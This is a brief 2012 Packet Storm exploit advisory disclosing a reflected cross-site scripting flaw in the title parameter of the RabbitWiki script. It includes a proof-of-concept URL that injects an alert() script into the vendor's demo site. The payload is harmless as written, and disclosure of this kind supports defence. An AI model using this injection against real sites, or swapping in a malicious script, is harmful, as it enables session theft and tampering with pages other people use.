RabbitWiki Cross Site Scripting

2012-02-10T00:00:00
ID PACKETSTORM:109628
Type packetstorm
Reporter Sony
Modified 2012-02-10T00:00:00

Description

                                        
                                            `# Exploit Title: RabbitWiki Cross Site Scripting  
# Date: 9.02.2012  
# Author: Sony  
# Software Link: http://www.rustyspigot.com/webmasters/s/RabbitWiki/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/rabbitwiki-cross-site-scripting.html  
..................................................................  
  
Simple Wiki.  
  
index.php?title=[our xss is here]  
  
Demo:  
  
http://www.rustyspigot.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-p9gnAXoNB0I/TzPILgWo2fI/AAAAAAAAAc0/yiDtrL-Rm88/s1600/rabbit.JPG  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`